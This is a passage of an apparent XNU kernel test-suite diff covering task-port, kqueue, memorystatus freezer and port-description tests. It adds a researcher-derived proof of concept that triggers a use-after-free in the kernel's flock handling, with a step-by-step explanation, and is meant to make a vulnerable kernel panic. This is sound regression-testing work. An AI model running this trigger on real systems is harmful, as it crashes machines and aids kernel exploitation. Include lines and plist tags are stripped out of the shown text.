read port..."); + T_ASSERT_MACH_SUCCESS(processor_set_tasks_with_flavor(pset, TASK_FLAVOR_READ, &tasks, &tcnt), NULL); + + for (j = 0; j < tcnt; j++) { + attempt_kernel_inspection(tasks[j]); + mach_port_deallocate(mach_task_self(), tasks[j]); /* the rights live in our own IPC space; the host port is not a valid target */ + } + + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)tasks, + tcnt * sizeof(*tasks)); + + mach_port_deallocate(mach_task_self(), pset); + mach_port_deallocate(mach_task_self(), psets[i]); + } + mach_vm_deallocate(mach_task_self(), + (mach_vm_address_t)(uintptr_t)psets, + pcnt * sizeof(*psets)); + + if (found_kernel_task != 2) { + /* One for kernel control port test, one for kernel read port test. */ + T_FAIL("could not find kernel_task in list of tasks returned"); + } +} diff --git a/tests/kqueue_file_tests.c b/tests/kqueue_file_tests.c index 6293e16c8..504b074d8 100644 --- a/tests/kqueue_file_tests.c +++ b/tests/kqueue_file_tests.c @@ -534,6 +534,7 @@ execute_test(test_t *test) if ((filefd = open(test->t_watchfile, O_RDONLY | O_SYMLINK)) == -1) { T_LOG("open() of watchfile %s failed: %d (%s)\n", test->t_watchfile, errno, strerror(errno)); + res = -1; } } @@ -610,9 +611,6 @@ execute_test(test_t *test) if (test->t_file_is_fifo) { close(writefd); } - } else { - T_LOG("Couldn't open test file %s to monitor: %d (%s)\n", test->t_watchfile); - res = -1; } if (!test->t_is_poll_test) { close(kqfd); diff --git a/tests/launchd_plists/com.apple.xnu.test.mach_port.plist b/tests/launchd_plists/com.apple.xnu.test.mach_port.plist new file mode 100644 index 000000000..d76f2a53f --- /dev/null +++ b/tests/launchd_plists/com.apple.xnu.test.mach_port.plist @@ -0,0 +1,27 @@ + + + + + MachServices + + com.apple.xnu.test.mach_port + + ResetAtClose + + + + ThrottleInterval + 1 + UserName + root + ProcessType + Adaptive + EnvironmentVariables + + MallocNanoZone + 1 + + LaunchOnlyOnce + + + diff --git a/tests/lockf_uaf_poc/README b/tests/lockf_uaf_poc/README new file mode 100644 index 000000000..0686e71d0 --- /dev/null +++ 
b/tests/lockf_uaf_poc/README @@ -0,0 +1,5 @@ +This Proof-of-Concept (PoC) is based on code from a security researcher +(see rdar://70587638), and should not be used for any other purpose other +than this test. In particular, this should not be used in other shipping +code or as reference material to create shipping code without first checking +with Apple Legal. diff --git a/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c b/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c new file mode 100644 index 000000000..903065675 --- /dev/null +++ b/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c @@ -0,0 +1,198 @@ +#include +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE)); + +#define TMP_FILE_NAME "lockf_uaf_poc_70587638" + +static int fd0, fd1, fd2; + +static int other_failure = 0; +static int other_failure_line = 0; + +static pthread_t thr0, thr1, thr2; + +#define RECORD_ERROR(err) do { \ + if (other_failure_line == 0) { \ + other_failure = (err); \ + other_failure_line = __LINE__; \ + } \ +} while (0); +#define MYCHECK_ERRNO(res) do { \ + if ((res) < 0) { \ + RECORD_ERROR((errno)); \ + return NULL; \ + } \ +} while (0) +#define MYCHECK_POSIX(res) do { \ + if ((res) != 0) { \ + RECORD_ERROR((res)); \ + return NULL; \ + } \ +} while (0) + +#define CHECK_OTHER_FAILURE() do { \ + int my_other_failure = other_failure; \ + int my_other_failure_line = other_failure_line; \ + other_failure_line = 0; /* re-arm the shared record; the snapshot taken above is what gets asserted */ \ + T_QUIET; \ + T_ASSERT_EQ(my_other_failure_line, 0, \ + "Other failure %d at line %d", \ + my_other_failure, my_other_failure_line); \ +} while (0); + +static void * +thr2_func(void *arg) +{ + int res; + + /* + * Wait for thr1 to be blocking on attempting to acquire lock C. See the comment at the top of + * `thr1_func` for the reason why sleep is used. + */ + (void) sleep(1u); + + /* + * Acquire another shared lock (lock D) on the file. 
At this point the file has acquired 2 + * locks; lock A and D which are both shared locks. It also has 2 exclusive locks currently + * blocking on lock A attempting to be acquired; lock B and C. + */ + res = flock(fd2, LOCK_SH); + MYCHECK_ERRNO(res); + + /* + * Unlock lock A, this will cause the first lock blocking on lock A to be unblocked (lock B) + * and all other locks blocking on it to be moved to blocking on the first blocked lock + * (lock C will now be blocking on lock B). Lock B's thread will be woken up resulting in it + * trying to re-acquire the lock on the file, as lock D is on the same file descriptor and + * already acquired on the file it will be promoted to an exclusive lock and B will be freed + * instead. At this point all locks blocking on lock B (lock C in this case) will now have a + * reference to a freed allocation. + */ + res = flock(fd0, LOCK_UN); + MYCHECK_ERRNO(res); + + return arg; +} + +static void * +thr1_func(void *arg) +{ + int res; + /* + * Wait for thr0 to be blocking on attempting to acquire lock B. Sleeping isn't great because + * it isn't an indication that the thread is blocked but I'm unsure how to detect a blocked + * thread programmatically and a 1 second sleep has never failed so far in tests so for now that + * is what is done. 
+ */ + (void) sleep(1u); + + // Another thread is required, spawn it now before blocking + res = pthread_create(&thr2, 0, thr2_func, 0); + MYCHECK_POSIX(res); + + // Block attempting to acquire an exclusive lock - lock C + res = flock(fd1, LOCK_EX); + MYCHECK_ERRNO(res); + + return arg; +} + +static void * +thr0_func(void *arg) +{ + int res; + + // Acquire a shared lock - lock A + res = flock(fd0, LOCK_SH); + MYCHECK_ERRNO(res); + + // Another thread is required, spawn it now before blocking + res = pthread_create(&thr1, 0, thr1_func, 0); + MYCHECK_POSIX(res); + + // Block attempting to acquire an exclusive lock - lock B + res = flock(fd2, LOCK_EX); + MYCHECK_ERRNO(res); + + return arg; +} + +static void +sigpipe_handler(int sig __unused, siginfo_t *sa __unused, void *ign __unused) +{ + return; +} + +T_DECL(lockf_uaf_poc_70587638, + "Do a sequence which caused lf_setlock() to free something still in-use.", + T_META_ASROOT(true), T_META_CHECK_LEAKS(false)) +{ + int res; + struct sigaction sa; + + T_SETUPBEGIN; + + (void) sigfillset(&sa.sa_mask); + sa.sa_sigaction = sigpipe_handler; + sa.sa_flags = SA_SIGINFO; + T_ASSERT_POSIX_SUCCESS(sigaction(SIGPIPE, &sa, NULL), "sigaction(SIGPIPE)"); + + // Setup all the file descriptors needed (fd0's open makes sure the file exists) + T_ASSERT_POSIX_SUCCESS( + fd0 = open(TMP_FILE_NAME, O_RDONLY | O_CREAT, 0666), + "open(\""TMP_FILE_NAME"\", O_RDONLY|O_CREAT, 0666)"); + T_ASSERT_POSIX_SUCCESS( + fd1 = open(TMP_FILE_NAME, O_RDONLY, 0666), + "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)"); + T_ASSERT_POSIX_SUCCESS( + fd2 = open(TMP_FILE_NAME, 0, 0666), + "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)"); + T_SETUPEND; + + /* + * Threads are used due to some locks blocking the thread when trying to acquire if a lock that + * blocks the requested lock already exists on the file. By using multiple threads there can be + * multiple locks blocking on attempting to acquire on a file. 
+ */ + res = pthread_create(&thr0, 0, thr0_func, 0); + T_ASSERT_POSIX_ZERO(res, "pthread_create thread 0"); + + /* + * Wait for lock B to be acquired which under the hood actually results in lock D being + * promoted to an exclusive lock and lock B being freed. At this point the bug has been + * triggered leaving lock C with a dangling pointer to lock B. + */ + res = pthread_join(thr0, NULL); + T_ASSERT_POSIX_ZERO(res, "pthread_join thread 0"); + + CHECK_OTHER_FAILURE(); + + // Trigger a signal to wake lock C from sleep causing it to do a UAF access on lock B + res = pthread_kill(thr1, SIGPIPE); + T_ASSERT_POSIX_ZERO(res, "pthread_kill thread 1"); + + CHECK_OTHER_FAILURE(); + + /* + * The kernel should panic at this point. This is just to prevent the + * application exiting before lock C's thread has woken from the signal. + * The application exiting isn't a problem but it will cause all the + * fds to be closed which will cause locks to be unlocked. This + * shouldn't prevent the PoC from working but it's just cleaner to + * wait here for the kernel to panic rather than exiting the process. 
+ */ + res = pthread_join(thr1, NULL); + T_ASSERT_POSIX_ZERO(res, "pthread_join thread 1"); + + CHECK_OTHER_FAILURE(); + + T_PASS("lockf_uaf_poc_70587638"); +} diff --git a/tests/memorystatus_freeze_test.c b/tests/memorystatus_freeze_test.c index 0e1e51ad6..eeffaf9ed 100644 --- a/tests/memorystatus_freeze_test.c +++ b/tests/memorystatus_freeze_test.c @@ -1,5 +1,6 @@ #include #include +#include #include #include #include @@ -553,6 +554,7 @@ launch_background_helper(const char* variant) pid_t pid; char **launch_tool_args; char testpath[PATH_MAX]; + char *variant_cpy = strdup(variant); uint32_t testpath_buf_size; int ret; @@ -562,7 +564,7 @@ launch_background_helper(const char* variant) launch_tool_args = (char *[]){ testpath, "-n", - variant, + variant_cpy, NULL }; ret = dt_launch_tool(&pid, launch_tool_args, false, NULL, NULL); @@ -573,6 +575,7 @@ launch_background_helper(const char* variant) /* Set the process's managed bit, so that the kernel treats this process like an app instead of a sysproc. 
*/ ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_MANAGED, pid, 1, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "memorystatus_control"); + free(variant_cpy); return pid; } @@ -608,7 +611,7 @@ memorystatus_assertion_test_demote_frozen() /* these values will remain fixed during testing */ int active_limit_mb = 15; /* arbitrary */ int inactive_limit_mb = 7; /* arbitrary */ - int demote_value = 1; + __block int demote_value = 1; /* Launch the child process, and elevate its priority */ int requestedpriority; dispatch_source_t ds_signal, ds_exit; @@ -729,20 +732,20 @@ is_proc_in_frozen_list(pid_t pid, char* name, size_t name_len) } static void -drop_jetsam_snapshot_ownership(void) +unset_testing_pid(void) { int ret; - ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP, NULL, 0); + ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_UNSET_TESTING_PID, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, 0, "Drop ownership of jetsam snapshot"); } static void -take_jetsam_snapshot_ownership(void) +set_testing_pid(void) { int ret; - ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP, NULL, 0); + ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_SET_TESTING_PID, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "Take ownership of jetsam snapshot"); - T_ATEND(drop_jetsam_snapshot_ownership); + T_ATEND(unset_testing_pid); } /* @@ -809,6 +812,17 @@ get_jetsam_snapshot_entry(memorystatus_jetsam_snapshot_t *snapshot, pid_t pid) return NULL; } +static dispatch_source_t +run_block_after_signal(int sig, dispatch_block_t block) +{ + dispatch_source_t ds_signal; + signal(sig, SIG_IGN); + ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, (uintptr_t) sig, 0, dispatch_get_main_queue()); + T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create"); + 
dispatch_source_set_event_handler(ds_signal, block); + return ds_signal; +} + /* * Launches the child & runs the given block after the child signals. * If exit_with_child is true, the test will exit when the child exits. @@ -818,11 +832,7 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant, { dispatch_source_t ds_signal, ds_exit; - /* Run the test block after the child launches & signals it's ready. */ - signal(SIGUSR1, SIG_IGN); - ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue()); - T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create"); - dispatch_source_set_event_handler(ds_signal, test_block); + ds_signal = run_block_after_signal(SIGUSR1, test_block); /* Launch the child process. */ child_pid = launch_background_helper(variant); /* Listen for exit. */ @@ -843,7 +853,6 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant, dispatch_activate(ds_exit); } dispatch_activate(ds_signal); - dispatch_main(); } T_DECL(get_frozen_procs, "List processes in the freezer") { @@ -862,6 +871,7 @@ T_DECL(get_frozen_procs, "List processes in the freezer") { T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process"); T_END; }); + dispatch_main(); } T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting") { @@ -897,11 +907,12 @@ T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process"); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") { /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. 
*/ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -920,11 +931,12 @@ T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") { free(snapshot); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") { /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -948,12 +960,13 @@ T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") { free(snapshot); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snapshot") { skip_if_freezer_is_disabled(); /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -975,12 +988,13 @@ T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snaps free(snapshot); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot_thaw_state, "Thaw count is recorded in freezer snapshot") { skip_if_freezer_is_disabled(); /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. 
*/ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -1017,11 +1031,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) { /* Set the process to freezable */ kern_ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_FREEZABLE, getpid(), 1, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(kern_ret, "set process is freezable"); - /* Signal to our parent that we can be frozen */ - if (kill(getppid(), SIGUSR1) != 0) { - T_LOG("Unable to signal to parent process!"); - exit(SIGNAL_TO_PARENT_FAILED); - } /* We should not be frozen yet. */ is_frozen = memorystatus_control(MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN, getpid(), 0, NULL, 0); @@ -1033,9 +1042,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) { exit(FROZEN_BIT_SET); } - - sig_t sig_ret = signal(SIGUSR1, SIG_IGN); - T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)"); ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue()); if (ds_signal == NULL) { exit(DISPATCH_SOURCE_CREATE_FAILED); @@ -1055,6 +1061,15 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) { }); dispatch_activate(ds_signal); + sig_t sig_ret = signal(SIGUSR1, SIG_IGN); + T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)"); + + /* Signal to our parent that we can be frozen */ + if (kill(getppid(), SIGUSR1) != 0) { + T_LOG("Unable to signal to parent process!"); + exit(SIGNAL_TO_PARENT_FAILED); + } + dispatch_main(); } @@ -1074,4 +1089,191 @@ T_DECL(memorystatus_get_process_is_frozen, "MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZ kill(child_pid, SIGUSR1); /* The child will checks its own frozen state & exit. 
*/ }); + dispatch_main(); +} + +static unsigned int freeze_pages_min_old; +static int throttle_enabled_old; +static void cleanup_memorystatus_freeze_top_process() { + sysctlbyname("kern.memorystatus_freeze_pages_min", NULL, NULL, &freeze_pages_min_old, sizeof(freeze_pages_min_old)); + sysctlbyname("kern.memorystatus_freeze_throttle_enabled", NULL, NULL, &throttle_enabled_old, sizeof(throttle_enabled_old)); +} + +#define P_MEMSTAT_FROZEN 0x00000002 +T_DECL(memorystatus_freeze_top_process, "memorystatus_freeze_top_process chooses the correct process", + T_META_ASROOT(true), + T_META_REQUIRES_SYSCTL_EQ("kern.development", 1), + T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) { + int32_t memorystatus_freeze_band = 0; + size_t memorystatus_freeze_band_size = sizeof(memorystatus_freeze_band); + size_t freeze_pages_min_size = sizeof(freeze_pages_min_old); + unsigned int freeze_pages_min_new = 0; + size_t throttle_enabled_old_size = sizeof(throttle_enabled_old); + int throttle_enabled_new = 1; + __block errno_t ret; + __block int maxproc; + size_t maxproc_size = sizeof(maxproc); + + ret = sysctlbyname("kern.maxproc", &maxproc, &maxproc_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kern.maxproc"); + sysctlbyname("kern.memorystatus_freeze_jetsam_band", &memorystatus_freeze_band, &memorystatus_freeze_band_size, NULL, 0); + + /* Set min pages to 0 and disable the budget to ensure we can always freeze the child. 
*/ + ret = sysctlbyname("kern.memorystatus_freeze_pages_min", &freeze_pages_min_old, &freeze_pages_min_size, &freeze_pages_min_new, sizeof(freeze_pages_min_new)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_pages_min"); + ret = sysctlbyname("kern.memorystatus_freeze_throttle_enabled", &throttle_enabled_old, &throttle_enabled_old_size, &throttle_enabled_new, sizeof(throttle_enabled_new)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_throttle_enabled"); + T_ATEND(cleanup_memorystatus_freeze_top_process); + /* Take ownership of the freezer probabilities for the duration of the test so that we don't race with dasd. */ + set_testing_pid(); + test_after_background_helper_launches(true, "frozen_background", ^{ + int32_t child_band = JETSAM_PRIORITY_DEFAULT; + /* Place the child in the idle band so that it gets elevated like a typical app. */ + move_to_idle_band(child_pid); + ret = pid_suspend(child_pid); + T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + + size_t buffer_len = sizeof(memorystatus_properties_entry_v1_t) * (size_t) maxproc; + memorystatus_properties_entry_v1_t *properties_list = malloc(buffer_len); + T_QUIET; T_ASSERT_NOTNULL(properties_list, "malloc properties array"); + size_t properties_list_len = 0; + /* The child needs to age down into the idle band before it's eligible to be frozen. 
*/ + T_LOG("Waiting for child to age into the idle band."); + while (child_band != JETSAM_PRIORITY_IDLE) { + memset(properties_list, 0, buffer_len); + properties_list_len = 0; + memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false); + + bool found = false; + for (size_t i = 0; i < snapshot->entry_count; i++) { + memorystatus_jetsam_snapshot_entry_t *snapshot_entry = &snapshot->entries[i]; + if (snapshot_entry->priority <= memorystatus_freeze_band && !snapshot_entry->killed) { + pid_t pid = snapshot_entry->pid; + memorystatus_properties_entry_v1_t *property_entry = &properties_list[properties_list_len++]; + property_entry->version = 1; + property_entry->pid = pid; + if (pid == child_pid) { + found = true; + property_entry->use_probability = 1; + child_band = snapshot_entry->priority; + } else { + property_entry->use_probability = 0; + } + strncpy(property_entry->proc_name, snapshot_entry->name, MAXCOMLEN); + property_entry->proc_name[MAXCOMLEN] = '\0'; + } + } + T_QUIET; T_ASSERT_TRUE(found, "Child is in on demand snapshot"); + free(snapshot); + } + ret = memorystatus_control(MEMORYSTATUS_CMD_GRP_SET_PROPERTIES, 0, MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY, properties_list, sizeof(memorystatus_properties_entry_v1_t) * properties_list_len); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY"); + free(properties_list); + int val = 1; + ret = sysctlbyname("vm.memorystatus_freeze_top_process", NULL, NULL, &val, sizeof(val)); + T_ASSERT_POSIX_SUCCESS(ret, "freeze_top_process"); + /* Verify that the process was frozen. */ + memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false); + memorystatus_jetsam_snapshot_entry_t *entry = get_jetsam_snapshot_entry(snapshot, child_pid); + T_ASSERT_NOTNULL(entry, "child is in snapshot"); + if (!(entry->state & P_MEMSTAT_FROZEN)) { + T_LOG("Not frozen. 
Skip reason: %d", entry->jse_freeze_skip_reason); + } + T_ASSERT_TRUE(entry->state & P_MEMSTAT_FROZEN, "child is frozen"); + free(snapshot); + ret = pid_resume(child_pid); + T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + + /* Kill the child */ + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process"); + T_END; + }); + dispatch_main(); +} + +static int +memorystatus_freezer_thaw_percentage(void) +{ + int val; + size_t size = sizeof(val); + int ret = sysctlbyname("kern.memorystatus_freezer_thaw_percentage", &val, &size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freezer_thaw_percentage"); + return val; +} + +static void +reset_interval(void) +{ + uint32_t freeze_daily_budget_mb = 0; + size_t size = sizeof(freeze_daily_budget_mb); + int ret; + uint64_t new_budget; + ret = sysctlbyname("kern.memorystatus_freeze_daily_mb_max", &freeze_daily_budget_mb, &size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freeze_daily_mb_max"); + new_budget = (freeze_daily_budget_mb * (1UL << 20) / vm_page_size); + ret = sysctlbyname("kern.memorystatus_freeze_budget_pages_remaining", NULL, NULL, &new_budget, sizeof(new_budget)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to set kern.memorystatus_freeze_budget_pages_remaining"); +} + +static pid_t second_child; +static void +cleanup_memorystatus_freezer_thaw_percentage(void) +{ + kill(second_child, SIGKILL); +} + +T_DECL(memorystatus_freezer_thaw_percentage, "memorystatus_freezer_thaw_percentage updates correctly", + T_META_ASROOT(true), + T_META_REQUIRES_SYSCTL_EQ("kern.development", 1), + T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) { + __block dispatch_source_t first_signal_block; + /* Take ownership of the freezer probabilities for the duration of the test so that nothing new gets frozen by dasd. 
*/ + set_testing_pid(); + reset_interval(); + + /* Spawn one child that will remain frozen throughout the whole test & another that will be thawed. */ + first_signal_block = run_block_after_signal(SIGUSR1, ^{ + move_to_idle_band(second_child); + __block int ret = pid_suspend(second_child); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(second_child); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage is still 0 after freeze"); + dispatch_source_cancel(first_signal_block); + test_after_background_helper_launches(true, "frozen_background", ^{ + reset_interval(); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a thaw percentage of 0"); + move_to_idle_band(child_pid); + ret = pid_suspend(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(child_pid); + ret = pid_resume(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + int percentage_after_thaw = memorystatus_freezer_thaw_percentage(); + T_QUIET; T_ASSERT_GT(percentage_after_thaw, 0, "thaw percentage is higher after thaw"); + + ret = pid_suspend(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(child_pid); + ret = pid_resume(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), percentage_after_thaw, "thaw percentage is unchanged after second thaw"); + + ret = pid_suspend(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(child_pid); + reset_interval(); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a 0 thaw percentage"); + ret = pid_resume(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + T_QUIET; T_ASSERT_GT(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage goes back up in new interval"); + + 
T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "failed to kill child"); + T_END; + }); + }); + + second_child = launch_background_helper("frozen_background"); + T_ATEND(cleanup_memorystatus_freezer_thaw_percentage); + dispatch_activate(first_signal_block); + dispatch_main(); } diff --git a/tests/memorystatus_is_assertion.c b/tests/memorystatus_is_assertion.c index b14feabdd..7574fee55 100644 --- a/tests/memorystatus_is_assertion.c +++ b/tests/memorystatus_is_assertion.c @@ -122,8 +122,8 @@ memorystatus_assertion_test_repetitive(char *test, boolean_t turn_on_dirty_track pid_t mypid = getpid(); /* these values will remain fixed during testing */ - int active_limit_mb = 15; /* arbitrary */ - int inactive_limit_mb = 10; /* arbitrary */ + int active_limit_mb = 35; /* arbitrary */ + int inactive_limit_mb = 25; /* arbitrary */ /* these values may vary during test */ int requestedpriority = 0; @@ -224,8 +224,8 @@ memorystatus_assertion_test_allow_idle_exit() pid_t mypid = getpid(); /* these values will remain fixed during testing */ - int active_limit_mb = 15; /* arbitrary */ - int inactive_limit_mb = 10; /* arbitrary */ + int active_limit_mb = 35; /* arbitrary */ + int inactive_limit_mb = 25; /* arbitrary */ /* these values may vary during test */ int requestedpriority = JETSAM_PRIORITY_UI_SUPPORT; @@ -349,8 +349,8 @@ memorystatus_assertion_test_do_not_allow_idle_exit() pid_t mypid = getpid(); /* these values will remain fixed during testing */ - int active_limit_mb = 15; /* arbitrary */ - int inactive_limit_mb = 10; /* arbitrary */ + int active_limit_mb = 35; /* arbitrary */ + int inactive_limit_mb = 25; /* arbitrary */ int requestedpriority = JETSAM_PRIORITY_AUDIO_AND_ACCESSORY; T_SETUPBEGIN; diff --git a/tests/memorystatus_vm_map_fork.c b/tests/memorystatus_vm_map_fork.c index ff73724cd..65f29b569 100644 --- a/tests/memorystatus_vm_map_fork.c +++ b/tests/memorystatus_vm_map_fork.c @@ -16,6 +16,8 @@ #include #include +#include "test_utils.h" + T_GLOBAL_META( 
T_META_NAMESPACE("xnu.vm"), T_META_CHECK_LEAKS(false) @@ -77,25 +79,6 @@ static char *child_exit_why[] = { "malloc() failed", }; -/* - * Corpse collection only happens in development kernels. - * So we need this to detect if the test is relevant. - */ -static boolean_t -is_development_kernel(void) -{ - int ret; - int dev = 0; - size_t dev_size = sizeof(dev); - - ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0); - if (ret != 0) { - return FALSE; - } - - return dev != 0; -} - /* * Set/Get the sysctl used to determine if corpse collection occurs. * This is done by the kernel checking for a specific PID. diff --git a/tests/perf_vmfault.c b/tests/perf_vmfault.c index db0613f96..9b86fe53f 100644 --- a/tests/perf_vmfault.c +++ b/tests/perf_vmfault.c @@ -8,6 +8,8 @@ #include #include +#include "benchmark/helpers.h" + T_GLOBAL_META( T_META_NAMESPACE("xnu.vm.perf"), T_META_CHECK_LEAKS(false), @@ -74,7 +76,6 @@ static void execute_threads(void); static void *thread_setup(void *arg); static void run_test(int fault_type, int mapping_variant, size_t memsize); static void setup_and_run_test(int test, int threads); -static int get_ncpu(void); /* Allocates memory using the default mmap behavior. Each VM region created is capped at 128 MB. 
*/ static void @@ -410,17 +411,6 @@ setup_and_run_test(int fault_type, int threads) T_END; } -static int -get_ncpu(void) -{ - int ncpu; - size_t length = sizeof(ncpu); - - T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0), - "failed to query hw.ncpu"); - return ncpu; -} - T_DECL(read_soft_fault, "Read soft faults (single thread)") { diff --git a/tests/port_descriptions.c b/tests/port_descriptions.c index 55d3c12b1..64bbab271 100644 --- a/tests/port_descriptions.c +++ b/tests/port_descriptions.c @@ -76,10 +76,11 @@ T_DECL(host_special_port_descriptions, TEST_HSP(HOST_SYSPOLICYD_PORT); TEST_HSP(HOST_FILECOORDINATIOND_PORT); TEST_HSP(HOST_FAIRPLAYD_PORT); + TEST_HSP(HOST_IOCOMPRESSIONSTATS_PORT); #undef TEST_HSP - T_EXPECT_EQ(HOST_FAIRPLAYD_PORT, HOST_MAX_SPECIAL_PORT, + T_EXPECT_EQ(HOST_IOCOMPRESSIONSTATS_PORT, HOST_MAX_SPECIAL_PORT, "checked all of the ports"); const char *invalid_hsp = @@ -96,6 +97,8 @@ T_DECL(task_special_port_descriptions, portdef, #portdef) TEST_TSP(TASK_KERNEL_PORT); + TEST_TSP(TASK_READ_PORT); + TEST_TSP(TASK_INSPECT_PORT); TEST_TSP(TASK_HOST_PORT); TEST_TSP(TASK_NAME_PORT); TEST_TSP(TASK_BOOTSTRAP_PORT); @@ -115,6 +118,28 @@ T_DECL(task_special_port_descriptions, "invalid task special port description should be NULL"); } +T_DECL(thread_special_port_descriptions, + "verify that thread special ports can be described") +{ +#define TEST_TSP(portdef) \ + expect_special_port_description(mach_thread_special_port_description, \ + portdef, #portdef) + + TEST_TSP(THREAD_KERNEL_PORT); + 